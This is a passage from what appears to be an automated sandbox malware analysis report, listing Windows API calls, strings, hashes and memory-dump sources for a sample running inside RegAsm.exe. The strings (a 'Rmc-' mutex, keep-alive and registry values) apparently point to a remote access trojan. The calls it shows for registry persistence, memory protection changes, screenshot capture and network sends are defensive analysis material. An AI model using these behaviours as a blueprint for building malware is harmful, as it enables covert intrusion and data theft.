                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                          • __freea.LIBCMT ref: 10008A11
                          • __freea.LIBCMT ref: 10008A36
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                          • String ID:
                          • API String ID: 1414292761-0
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CountEventTick
                          • String ID: !D@$NG
                          • API String ID: 180926312-2721294649
                          APIs
                          • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                          • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                          Strings
                          • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Create$EventLocalThreadTime
                          • String ID: KeepAlive | Enabled | Timeout:
                          • API String ID: 2532271599-1507639952
                          APIs
                          • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                          • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                          • RegCloseKey.KERNEL32(?), ref: 004137EC
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CloseCreateValue
                          • String ID: pth_unenc
                          • API String ID: 1818849710-4028850238
                          APIs
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                          • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                          • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Create$CloseEventHandleObjectSingleThreadWait
                          • String ID:
                          • API String ID: 3360349984-0
                          APIs
                          • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                            • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                            • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: HandleModuleProtectVirtual
                          • String ID:
                          • API String ID: 2905821283-0
                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                          • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID:
                          • API String ID: 3177248105-0
                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                          • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID:
                          • API String ID: 3177248105-0
                          APIs
                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C568
                          • CloseHandle.KERNEL32(00000000), ref: 0041C576
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: File$CloseCreateHandleReadSize
                          • String ID:
                          • API String ID: 3919263394-0
                          APIs
                          • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418AF9
                            • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                          • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                            • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                            • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                          • String ID: image/jpeg
                          • API String ID: 1291196975-3785015651
                          • Opcode ID: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                          • Instruction ID: 4d0b5c8bb5c89928ccad9adfa1773eea8e0f3015d74a4b244142dc53e7d0f70c
                          • Opcode Fuzzy Hash: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                          • Instruction Fuzzy Hash: B5316D71604300AFC301EF65C884DAFBBE9EF8A304F00496EF985A7251DB7999048BA6
                          APIs
                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                          • GetLastError.KERNEL32 ref: 0040D0BE
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateErrorLastMutex
                          • String ID: Rmc-7B1J99
                          • API String ID: 1925916568-1545472424
                          • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                          • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                          • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                          • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                          APIs
                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                            • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                            • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                            • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                           • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: HandleModuleProtectVirtual
                          • String ID:
                          • API String ID: 2905821283-0
                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                          APIs
                          • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                          • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: EventObjectSingleWaitsend
                          • String ID:
                          • API String ID: 3963590051-0
                          • Opcode ID: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                          • Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
                          • Opcode Fuzzy Hash: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                          • Instruction Fuzzy Hash: 152124B2900119BBCB04ABA1DC95DEEB77CFF14314B00452FF515B71E2EB38AA15C6A4
                          APIs
                          • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                          • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                           • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: ProtectVirtual$HandleModule
                          • String ID:
                          • API String ID: 3519776433-0
                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                          APIs
                          • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                          • RegQueryValueExA.KERNEL32 ref: 00413622
                          • RegCloseKey.KERNEL32(?), ref: 0041362D
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID:
                          • API String ID: 3677997916-0
                          • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                          • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                          • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                          • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                          APIs
                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                          • RegQueryValueExA.KERNEL32 ref: 00413768
                          • RegCloseKey.KERNEL32(00000000), ref: 00413773
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID:
                          • API String ID: 3677997916-0
                          • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                          • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                          • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                          • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                          APIs
                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                          • RegQueryValueExA.KERNEL32 ref: 004135C2
                          • RegCloseKey.KERNEL32(?), ref: 004135CD
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID:
                          • API String ID: 3677997916-0
                          • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                          • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                          • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                          • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                          APIs
                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413551
                          • RegQueryValueExA.KERNEL32 ref: 00413565
                          • RegCloseKey.KERNEL32(?), ref: 00413570
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID:
                          • API String ID: 3677997916-0
                          • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                          • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                          • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                          • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                          APIs
                          • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                          • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                          • RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateValue
                          • String ID:
                          • API String ID: 1818849710-0
                          • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                          • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                          • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                          • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                          APIs
                          • GdiplusStartup.GDIPLUS(00474ACC,?,00000000,00000000), ref: 004187FA
                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00D64950,00000010), ref: 004048E0
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: GdiplusStartupconnectsend
                          • String ID: NG
                          • API String ID: 1957403310-1651712548
                          • Opcode ID: ac95375dd8309d9e0ed2265105671e99074506a039fa72e05eb7aa568a42b0db
                          • Instruction ID: 646e85ae029ebb21aec6d49858a727e037fa7bb3a6359959f193cd142bf324ca
                          • Opcode Fuzzy Hash: ac95375dd8309d9e0ed2265105671e99074506a039fa72e05eb7aa568a42b0db
                          • Instruction Fuzzy Hash: 8E41D4713042015BC208FB22D892ABF7396ABC0358F50493FF54A672D2EF7C5D4A869E
                          APIs
                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                           • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: Info
                          • String ID:
                          • API String ID: 1807457897-3916222277
                          • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                          • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                          • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                          • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                          APIs
                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Info
                          • String ID:
                          • API String ID: 1807457897-3916222277
                          • Opcode ID: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                          • Instruction ID: 2d4132b881e94a0a9fd0de77a922cbe9b4a8b8c61ff6a95216f325efaac8b060
                          • Opcode Fuzzy Hash: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                          • Instruction Fuzzy Hash: 7E411070504748AFEF218E25CC84AF7BBB9FF45304F2404EEE59987142D2399A46DF65
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _wcslen
                          • String ID: ;|
                          • API String ID: 176396367-2167424691
                          • Opcode ID: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                          • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                          • Opcode Fuzzy Hash: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                          • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                          APIs
                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                           • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: String
                          • String ID: LCMapStringEx
                          • API String ID: 2568140703-3893581201
                          • Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                          • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                          • Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                          • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                          APIs
                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: String
                          • String ID: LCMapStringEx
                          • API String ID: 2568140703-3893581201
                          • Opcode ID: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                          • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                          • Opcode Fuzzy Hash: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                          • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                          APIs
                          • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
                          Strings
                          • InitializeCriticalSectionEx, xrefs: 00448B1F
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CountCriticalInitializeSectionSpin
                          • String ID: InitializeCriticalSectionEx
                          • API String ID: 2593887523-3084827643
                          • Opcode ID: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                          • Instruction ID: 6b0d226957fc5e3530c80ec385177705bb254131620a7d42d33c8bf65efe755d
                          • Opcode Fuzzy Hash: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
